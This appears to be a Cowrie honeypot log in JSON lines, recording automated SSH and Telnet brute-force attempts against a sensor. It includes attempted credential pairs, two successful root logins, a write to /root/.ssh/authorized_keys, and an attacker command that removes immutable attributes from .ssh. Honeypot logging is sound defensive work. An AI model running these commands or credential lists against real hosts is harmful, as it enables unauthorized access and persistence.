{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:17:15.359968Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:15.360832Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38958,"dst_ip":"1.2.3.4","dst_port":22,"session":"19658c69e8b7","protocol":"ssh","message":"New connection: 212.227.235.229:38958 (1.2.3.4:22) [session: 19658c69e8b7]","sensor":"my-vps","timestamp":"2025-08-31T06:17:15.650214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:17:15.651146Z","src_ip":"212.227.235.229","session":"19658c69e8b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:17:15.947684Z","src_ip":"212.227.235.229","session":"19658c69e8b7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:17:17.176525Z","src_ip":"212.227.235.229","session":"19658c69e8b7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:18.475160Z","src_ip":"212.227.235.229","session":"19658c69e8b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40030,"dst_ip":"1.2.3.4","dst_port":22,"session":"75f61bb3d61f","protocol":"ssh","message":"New connection: 212.227.235.229:40030 (1.2.3.4:22) [session: 75f61bb3d61f]","sensor":"my-vps","timestamp":"2025-08-31T06:17:18.760820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:17:18.761757Z","src_ip":"212.227.235.229","session":"75f61bb3d61f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:17:19.042871Z","src_ip":"212.227.235.229","session":"75f61bb3d61f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:17:20.210906Z","src_ip":"212.227.235.229","session":"75f61bb3d61f"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:20.493411Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:20.494702Z","src_ip":"212.227.235.229","session":"75f61bb3d61f"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:17:22.178565Z","src_ip":"212.227.125.160","session":"eb068be2e6cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40422,"dst_ip":"1.2.3.4","dst_port":22,"session":"aea9ef08e707","protocol":"ssh","message":"New connection: 212.227.235.229:40422 (1.2.3.4:22) [session: aea9ef08e707]","sensor":"my-vps","timestamp":"2025-08-31T06:17:24.945572Z"}
{"eventid":"cowrie.session.closed","duration":"32.0","message":"Connection lost after 32.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:26.021409Z","src_ip":"212.227.125.160","session":"eb068be2e6cc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:17:28.663531Z","src_ip":"212.227.235.229","session":"aea9ef08e707"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:17:28.684495Z","src_ip":"212.227.235.229","session":"aea9ef08e707"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38684,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae7cc07cd9e6","protocol":"ssh","message":"New connection: 212.227.235.229:38684 (1.2.3.4:22) [session: ae7cc07cd9e6]","sensor":"my-vps","timestamp":"2025-08-31T06:17:40.628953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:17:40.629951Z","src_ip":"212.227.235.229","session":"ae7cc07cd9e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:17:40.888447Z","src_ip":"212.227.235.229","session":"ae7cc07cd9e6"}
{"eventid":"cowrie.login.failed","username":"netadmin","password":"netadmin","message":"login attempt [netadmin/netadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:17:41.957975Z","src_ip":"212.227.235.229","session":"ae7cc07cd9e6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:43.221870Z","src_ip":"212.227.235.229","session":"ae7cc07cd9e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35336,"dst_ip":"1.2.3.4","dst_port":22,"session":"fefcb35fa372","protocol":"ssh","message":"New connection: 212.227.235.229:35336 (1.2.3.4:22) [session: fefcb35fa372]","sensor":"my-vps","timestamp":"2025-08-31T06:17:45.460066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:17:46.228886Z","src_ip":"212.227.235.229","session":"fefcb35fa372"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:17:46.229690Z","src_ip":"212.227.235.229","session":"fefcb35fa372"}
{"eventid":"cowrie.login.failed","username":"test4","password":"letmein","message":"login attempt [test4/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:17:52.207881Z","src_ip":"212.227.235.229","session":"fefcb35fa372"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:53.996149Z","src_ip":"212.227.235.229","session":"fefcb35fa372"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41424,"dst_ip":"1.2.3.4","dst_port":22,"session":"f42b0a52a2c0","protocol":"ssh","message":"New connection: 212.227.235.229:41424 (1.2.3.4:22) [session: f42b0a52a2c0]","sensor":"my-vps","timestamp":"2025-08-31T06:18:00.392111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:18:00.393121Z","src_ip":"212.227.235.229","session":"f42b0a52a2c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:18:00.675875Z","src_ip":"212.227.235.229","session":"f42b0a52a2c0"}
{"eventid":"cowrie.login.failed","username":"jvj","password":"jvj","message":"login attempt [jvj/jvj] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:01.849922Z","src_ip":"212.227.235.229","session":"f42b0a52a2c0"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:03.134972Z","src_ip":"212.227.235.229","session":"f42b0a52a2c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53304,"dst_ip":"1.2.3.4","dst_port":22,"session":"995ef553928e","protocol":"ssh","message":"New connection: 212.227.125.160:53304 (1.2.3.4:22) [session: 995ef553928e]","sensor":"my-vps","timestamp":"2025-08-31T06:18:06.613705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:18:07.119844Z","src_ip":"212.227.125.160","session":"995ef553928e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:18:07.143982Z","src_ip":"212.227.125.160","session":"995ef553928e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56782,"dst_ip":"1.2.3.4","dst_port":23,"session":"16bf31de4b2d","protocol":"telnet","message":"New connection: 212.227.235.229:56782 (1.2.3.4:23) [session: 16bf31de4b2d]","sensor":"my-vps","timestamp":"2025-08-31T06:18:08.349792Z"}
{"eventid":"cowrie.login.failed","username":"test4","password":"letmein","message":"login attempt [test4/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:09.255914Z","src_ip":"212.227.125.160","session":"995ef553928e"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:10.778907Z","src_ip":"212.227.125.160","session":"995ef553928e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37058,"dst_ip":"1.2.3.4","dst_port":22,"session":"83a0d885ab2f","protocol":"ssh","message":"New connection: 212.227.125.160:37058 (1.2.3.4:22) [session: 83a0d885ab2f]","sensor":"my-vps","timestamp":"2025-08-31T06:18:13.522896Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:19.668763Z","src_ip":"212.227.235.229","session":"aea9ef08e707"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17394,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f45d8dc952","protocol":"ssh","message":"New connection: 212.227.235.229:17394 (1.2.3.4:22) [session: 78f45d8dc952]","sensor":"my-vps","timestamp":"2025-08-31T06:18:20.399290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:18:20.400416Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:18:20.609617Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:18:20.813999Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
{"eventid":"cowrie.session.closed","duration":12.51818561553955,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:20.867898Z","src_ip":"212.227.235.229","session":"16bf31de4b2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:18:20.896838Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
{"eventid":"cowrie.login.success","username":"root","password":"Root.2023","message":"login attempt [root/Root.2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:18:21.451817Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:18:21.894906Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:18:21.895628Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:18:21.896504Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:22.107728Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:18:22.597338Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
